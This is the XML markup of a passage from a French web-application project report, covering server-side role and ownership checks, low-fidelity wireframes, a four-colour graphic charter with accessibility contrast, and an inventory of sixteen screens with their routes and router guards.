    <w:bookmarkStart w:id="50" w:name="X9f3d51e6c1075e00938405369d67571f05d99a7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Vérification des autorisations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le rôle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">n'est pas lu dans le JWT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mais relu en base à chaque appel d'une route</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un jeton émis avant une rétrogradation resterait valide jusqu'à son expiration ; lire le rôle en base ferme cette fenêtre. Symétriquement, chaque accès à un document ou un dossier vérifie son rattachement à l'utilisateur courant : l'identifiant transmis dans l'URL n'est jamais tenu pour légitime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A212FE6" w14:textId="5403AA1A" w:rsidR="003A2DEC" w:rsidRPr="00B1648B" w:rsidRDefault="003A2DEC" w:rsidP="003A2DEC">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc198828312"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Les maquettes et enchaînement des maquettes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00B1648B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Démarche de maquettage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Le dossier de maquettage s'est construit en trois temps : recensement des écrans nécessaires à partir du périmètre fonctionnel du cahier des charges (§ 2), définition de la charte graphique et des composants récurrents, puis formalisation de l'enchaînement des écrans sous forme de schéma.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les maquettes sont des</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">wireframes basse fidélité</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>: blocs, libellés et hiérarchie, sans couleur ni typographie définitive. Ce niveau de détail est délibéré. Une maquette qui ressemble déjà au produit fini déplace la discussion vers l'apparence, alors que ce qui doit être arrêté à ce stade est la composition : quelles informations sur quel écran, dans quel ordre, atteignables depuis où. La charte graphique est traitée séparément, et le rendu final relève des captures d'écran (§ 7.1).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Chaque planche porte une référence (W-01 à W-09) et ses</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">intentions de conception</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">annotées — la raison d'être de chaque bloc, et non seulement sa présence. Ce sont ces annotations qui font le lien entre le cahier des charges et l'écran : la case de consentement non pré-cochée de W-02 répond à l'exigence RGPD, le panneau IA de W-07 au « résultat affiché de manière différenciée ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le maquettage a servi deux objectifs. D'abord vérifier la couverture : chaque fonctionnalité listée au cahier des charges doit être atteignable depuis un écran identifié. Ensuite fixer le découpage en composants réutilisables — c'est ce qui a isolé</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Nav</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Footer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">et</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MarkdownEditor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">comme composants partagés plutôt que comme fragments recopiés d'une vue à l'autre.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="52"/>
    <w:bookmarkStart w:id="53" w:name="X59f864ed4ebf2ebf9bfc1ea9ad221c783ffa530"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Charte graphique</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La charte est volontairement restreinte à quatre couleurs et trois familles typographiques, appliquées de façon homogène sur les 16 écrans.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Valeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fond principal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">#F4F1EA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Arrière-plan de toutes les pages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fond de panneau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">#FAF8F5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cartes, barres d'outils, zone d'aperçu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Texte et bordures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">#111111</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Texte, bordures pleines de 1 à 2 px, ombres portées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Accent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t>#C4341C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Actions principales, curseur, sélection, liens, surtitres. Teinte de survol : #A72C18</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Famille</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sans-serif système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Corps de texte et interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serif (Georgia)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Titres de niveau 1 à 3 dans les contenus rédigés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Monospace</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Surtitres, métadonnées, libellés techniques, barre d'outils</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le parti pris visuel est un style éditorial marqué : bordures pleines noires, ombres portées dures (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">8px 8px 0 #111111</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), pas d'arrondis, surtitres en capitales encadrés. Ce choix sert aussi l'accessibilité — le couple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#111111</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sur</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">#F4F1EA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">offre un rapport de contraste très supérieur au seuil de 4,5:1 exigé par le RGAA 4.1.2 pour le texte courant.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="53"/>
    <w:bookmarkStart w:id="54" w:name="X96f8555da15ab1b8b3bc0a58ff36b25531694a5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inventaire des écrans</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Seize écrans, répartis en trois zones d'accès contrôlées par les gardes du routeur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Zone publique — accessible sans compte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Présentation du service, appels à l'action vers l'inscription</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fonctionnalités</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/fonctionnalites</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Détail des trois actions IA et de la gestion documentaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modèles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/modeles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Exemples de documents types : courriels et rapports, contrats, courriers, administratif</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tarifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/tarifs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Offres commerciales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mentions légales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/mentions-legales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Obligation LCEN du 21 juin 2004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CGU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/cgu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Conditions d'utilisation, responsabilité éditoriale sur les contenus générés</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Politique de confidentialité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/confidentialite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Traitement des données, base légale, droits RGPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Zone d'authentification — réservée aux visiteurs non connectés (garde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">guestOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserv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Connexion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Authentification par email et mot de passe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Création de compte avec recueil du consentement RGPD</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mot de passe oublié</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/forgot-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Demande du lien de réinitialisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Réinitialisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/reset-password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Saisie du nouveau mot de passe à partir du jeton reçu par courriel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Un utilisateur déjà connecté qui tente d'atteindre l'un de ces écrans est redirigé vers son tableau de bord : la garde</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">guestOnly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">évite les états incohérents comme une double connexion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Zone authentifiée — garde</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">requiresAuth</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Trois compteurs de documents, trois portes d'entrée vers la rédaction, recherche</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Liste paginée, filtrage par dossier, gestion des dossiers, statuts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nouveau document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/nouveau</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Création — même composant de vue que l'édition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Édition d'un document</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/documents/:id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Éditeur Markdown, panneau IA, historique des interactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Back-office</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Gestion des comptes et statistiques globales — garde</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">requiresAdmin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">en plus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les vues « nouveau document » et « édition » partagent délibérément le même composant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DocumentEditorView</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: l'interface de rédaction est identique, seule la présence d'un identifiant dans l'URL change le comportement à l'enregistrement.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="54"/>
